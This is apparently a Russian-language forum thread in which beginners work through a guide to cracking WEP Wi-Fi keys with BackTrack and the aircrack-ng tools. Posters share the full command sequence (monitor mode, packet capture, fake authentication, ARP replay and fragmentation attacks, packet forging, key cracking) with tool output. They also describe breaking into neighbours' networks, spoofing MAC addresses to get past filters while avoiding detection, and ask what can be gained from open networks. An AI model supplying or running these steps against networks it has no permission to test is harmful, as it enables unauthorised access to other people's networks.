9 шагов или BT5, взлом wep для начинающих!

отот текст с верху обозначает что все ништяк! он должен появиться 2 раза .. потом у тя проценты пойдут! ты увидиш ... если атака удалась то пакеты очень быстро собируться я пока по курил около 50 тыщ уже было ...
вот тебе дока pdf глянь ... тема такая если атака не прошла ты ее закрываеш .. если вторая не прошла тож закрываеш ... или пытаешься зделать позже смысл в бекон пакетах любым макаром их нада собирать.. -)

 

Здраствуй LuCiFeR ты прошёл Association на AP значит твои пакеты она принимает теперь жди клиента , когда полетят data пакеты проведи инжекцию aireplay-ng -3 ... или aireplay-ng -2... ; но до этого нужно обязательно пройти Association тоесть aireplay-ng -1 0 ... ;при проведении инжекции крути свой ноутбук или антенну чтобы скорость приёма data пакетов была максимальной , плохой сигнал скорость 50-100 p/s хороший сигнал 300-400 p/s.После приема 25000 пакетов запускай другую консоль Aircrack-ng с параметром -n 64 если в кносоли где работает airodump-ng количество data пакетов перевалит за 100000-150000 а пороль не будет найден попробуй запустить aircrack-ng с параметром -n 128 и тд.
Удачи тебе, wep точки будут твои!

 

Что я уже только не пробовал нифига не получается... давайте по порядку, ткните носом что я делаю не так:

1. Конфигурирую точку.. WEP 64bit
2. ifconfig wlan0 up
2. airmon-ng start wlan0 6

Code:

Interface       Chipset         Driver

wlan0           Atheros         ath9k - [phy0]
                                (monitor mode enabled on mon0)

airodump-ng mon0

Code:

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:1B:11:E2:0E:FB  -59       16        0    0   6  54   WEP  WEP         AsusLan

airodump-ng -c 6 --bssid 02:1B:11:E2:0E:FB -w capture mon0

Code:

CH  6 ][ Elapsed: 4 s ][ 2009-11-07 17:44

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:1B:11:E2:0E:FB  -44 100       63        0    0   6  54   WEP  WEP         AsusLan

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Далее открываю новую консоль.
Пишу

aireplay-ng -1 0 -a 02:1B:11:E2:0E:FB -h 00:24:23:05:2A:31 mon0

Получаю:

Code:

17:46:25  Waiting for beacon frame (BSSID: 02:1B:11:E2:0E:FB) on channel 6

17:46:25  Sending Authentication Request (Open System) [ACK]
17:46:25  Authentication successful
17:46:25  Sending Association Request [ACK]
17:46:25  Denied (code 12), wrong ESSID or WPA ?

17:46:28  Sending Authentication Request (Open System) [ACK]
17:46:28  Authentication successful
17:46:28  Sending Association Request [ACK]
17:46:28  Denied (code 12), wrong ESSID or WPA ?

Ето только на моей точке, остальные проходят этот пункт отлично, а вот остальные не очень.

 

LuCiFeR 1. Конфигурирую точку.. WEP 64bit

а wep open или psk

 

Там нету таких настроек, только сессию Guest можно разрешить, собственно это я и сделал...
А вообще так тока на моей точке, на других нормально этот пункт работает... а вот с остальными беда...

 

спасибо за статью есть два вопроса : после этой команды
5. 2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) mon0
процесс не останавливаеться . так и надо ?
как запустить 8 пункт что то не получаеться 8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
куда записывать получиные Saving plaintext in replay_dec-1108-140631.cap
Saving keystream in replay_dec-1108-140631.xor ? пример если не трудно
сильно не пеняйте новичка

 

внимательней читай 8 пункт запускаеться тады если у тя атака удалась то есть -4 -5 ...

 

вроде и делаю как написано только не останавливается команда 5.2 .
только я на хубунте счас докачает бт4 попробую ещё!
всеравно 8 непонятна !

 

wesside кто нить пробавал если то как прошло ?

 

смари ты запускаешь -1 --- он должен быть в режиме мониторинга обизательно без ошибок аутентификацыя твоей карты если все хорошо пишет ,,ливе пакет,, -- чет типа того один и тот же текст , потом запускаеш -4 -5 --- ето атака одна из них должна сработать если сработало или -4 или -5 ут япоивиццо в окне проценты таблица типа и пакеты будут собираццо с большой скоростю вот и када набереться достаточное количество пакетов окно само остановиться и будет писать что файл .cap .xor найдены ... после етого (если у тя есть больше чем 30 000 пакетов можеш пробовать ломать) -- в ето время пакеты собираються сами ты не останавлииваешь никакой процес ! через каждые 10 000 пакетов юзай команду аиркряка так как там написано .... вобще м то все ..

 

перевел карту поменял мак потом
аirodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
aireplay-ng mon0 -1 4000 -a 00:14:6C:7E:40:80
крек и все получил ключ на все заняло минут 15 это на другой
а которую первую пробовал там полный ноль не шевелиться хоть тресни
на ночь ставил только 600 пакетов
вокруг меня таких непонятных гнездо у них и имена похожи
в чём дело непойму . пойду бубен куплю
благодорю за внимание разобрался фильтр по маку все про все 1 час 15 мин

 

Есть пакет хор. , пока не раьотает это
Такой вопрос есть ключ от первой сети айфон подключил без проблем а комп не даёт что за пзц ?)

 

возможно на роутере стоит фильтр по МАК адресам и тебя не пускает!.

 

так и было , подождал до подключения клиента , записал мак , поменял и я в полете
спасибо очень просто даже для новичка

 

Доброго времени суток уважаемые ! Использую bt4 . В гугле уже прописался ,перечитал все , что можно , но никак не пойму алгоритм последовательности команд : начну по порядку как написано в топе .
1. airmo-ng

выскакивает две карты wlan0 и wlan1 (где wlan0 встроеный в лоптоп, а wlan1, это alfa awus036h)
2. airmon-ng start wlan1 запуск карты в режиме мониторинга

3. airodump-ng wlan1 пошел мониторинг списка сетей, ывбрал сеть. Остановил процесс ctrl+c дальше airmon-ng stop wlan1

4. airodump-ng -c канал сети --bssid мак сети -w capture wlan1
пошел процесс сбора beacons и data пакетов. Здесь вопрос : нужно ли останавливать этот процесс после набора нужного кол-ва data пакетов , или пункты 4,5,6 делаются сразу друг за другом ?

И еще впрос в процессе мониторинга сете , в зоне захвата которых я нахожусь попадаются открытые сети без всякого шифрования ENK OPN , там beacons и data пакеты просто летают(за 15 мин beacons 9000 а data 50000), подключаюсь к ней пишет что доступ только локальная сеть! Какую выгоду можно извлечь из этого ?

 

Sorry забыл за ранее поблагодарить за помощь !

 

Останавливать не нужно пускай airodump-ng набирает пакеты. А мак не ленись меняй сразу не пались.

 

Остановился на 8 пункте packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно, окна нет. Появляется Wrote packet to: arp-request что это?В чем проблема?

 

подскажите , точка открытая . Но пускать не хочет .(вероятно фильтр мака)
вопрос -- как узнать - есть ли на ней клиент , и его мак ???

 

(virtualbox) Backtrack не видит мою карточку

Есть идеи как сие исправить? У меня Edimax 7318USg.